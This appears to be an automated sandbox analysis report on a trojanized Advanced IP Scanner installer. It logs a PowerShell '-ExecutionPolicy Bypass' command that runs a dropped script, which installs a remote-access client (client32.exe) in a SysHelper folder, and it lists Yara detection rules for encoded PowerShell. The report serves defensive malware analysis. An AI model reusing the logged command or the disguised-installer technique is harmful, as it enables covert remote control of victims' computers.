                                  Source: Yara matchFile source: 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 5304, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 2228, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 1832, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL, type: DROPPED

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,7_2_11112840
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,8_2_11112840

                                  System Summary

                                  barindex
                                  Source: amsi32_7132.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                  Source: Process Memory Space: powershell.exe PID: 7132, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\remcmdstub.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\client32.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelper\msvcr100.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeProcess Stats: CPU usage > 49%
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_110A9240: DeviceIoControl,7_2_110A9240
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1115A340 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,7_2_1115A340
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,8_2_1102CE2D
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07675D0A5_2_07675D0A
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_110292307_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_110724607_2_11072460
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1115B1807_2_1115B180
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1107F5207_2_1107F520
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1101B9807_2_1101B980
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1115F9F07_2_1115F9F0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1101BDC07_2_1101BDC0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11163C557_2_11163C55
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_110504307_2_11050430
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_110088DB7_2_110088DB
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1101CBE07_2_1101CBE0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11032A607_2_11032A60
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11086DA07_2_11086DA0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11044C607_2_11044C60
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_6859A9807_2_6859A980
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_685C49107_2_685C4910
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_685C39237_2_685C3923
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_6859DBA07_2_6859DBA0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_685C3DB87_2_685C3DB8
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_685CA0637_2_685CA063
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1115B1808_2_1115B180
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_110292308_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1107F5208_2_1107F520
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1101B9808_2_1101B980
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1115F9F08_2_1115F9F0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1101BDC08_2_1101BDC0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11163C558_2_11163C55
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_110504308_2_11050430
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_110724608_2_11072460
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_110088DB8_2_110088DB
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1101CBE08_2_1101CBE0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11032A608_2_11032A60
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11086DA08_2_11086DA0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11044C608_2_11044C60
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeProcess token adjusted: SecurityJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: String function: 685A7D00 appears 71 times
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: String function: 685A7A90 appears 36 times
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: String function: 685930A0 appears 33 times
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: String function: 11142A60 appears 1055 times
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: String function: 68596F50 appears 115 times
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: String function: 11080C50 appears 64 times
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: String function: 1116B7E0 appears 54 times
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: String function: 1115CBB3 appears 92 times
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: String function: 110290F0 appears 1919 times
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: String function: 1105D340 appears 492 times
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: String function: 1109CBD0 appears 32 times
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: String function: 111434D0 appears 42 times
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: String function: 1105D470 appears 41 times
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: String function: 11027550 appears 94 times
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: String function: 11160790 appears 64 times
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                  Source: is-J88P9.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                  Source: is-J88P9.tmp.1.drStatic PE information: Number of sections : 11 > 10
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exeStatic PE information: Number of sections : 11 > 10
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp.0.drStatic PE information: Number of sections : 11 > 10
                                  Source: is-9QSUE.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-GUGRV.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-GSEGB.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-JD615.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-BI69I.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-JV2VP.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-51B0J.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-GO656.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-HE8PV.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-UNM54.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-T33P0.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-UUUMK.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-E5GMR.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-VU48S.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-MLS3P.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-B6942.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-3DFK3.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-IMIK4.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-37BEP.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-7T7KO.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-CFBB0.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-HU2BS.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-4PSUK.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-94LO6.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-2CC7N.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-087J4.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-G1AVJ.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-NAJMA.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-8NFDN.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-8I66A.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-3ARML.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-NDG98.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-KVJOO.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-QNSIE.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-7UOKJ.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-JMQQ6.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-NMSBJ.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-50T4N.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-OFA57.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-QK8GI.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1793005719.000000007EDFB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Advanced_IP_Scanner_2.5.4594.12.exe
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000000.1787412692.0000000000B09000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Advanced_IP_Scanner_2.5.4594.12.exe
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1792633341.00000000034DF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Advanced_IP_Scanner_2.5.4594.12.exe
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exeBinary or memory string: OriginalFileName vs Advanced_IP_Scanner_2.5.4594.12.exe
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: amsi32_7132.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                  Source: Process Memory Space: powershell.exe PID: 7132, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                  Source: classification engineClassification label: mal56.rans.spre.troj.evad.winEXE@10/300@3/3
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11059270 GetLastError,FormatMessageA,LocalFree,7_2_11059270
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,7_2_1109C750
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,7_2_1109C7E0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,8_2_1109C750
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,8_2_1109C7E0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11095C90 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,7_2_11095C90
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11088290 FindResourceA,LoadResource,LockResource,7_2_11088290
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile created: C:\Program Files (x86)\Advanced IP ScannerJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SysHelperJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_03
                                  Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exeFile created: C:\Users\user\AppData\Local\Temp\is-I11J0.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exeString found in binary or memory: /LOADINF="filename"
                                  Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exeFile read: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe "C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe"
                                  Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exeProcess created: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp "C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1"
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe "C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe "C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe "C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
                                  Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exeProcess created: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp "C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1"Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe "C:\Users\user\AppData\Roaming\SysHelper\client32.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: explorerframe.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: sfc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: linkinfo.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: ntshrui.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: cscapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
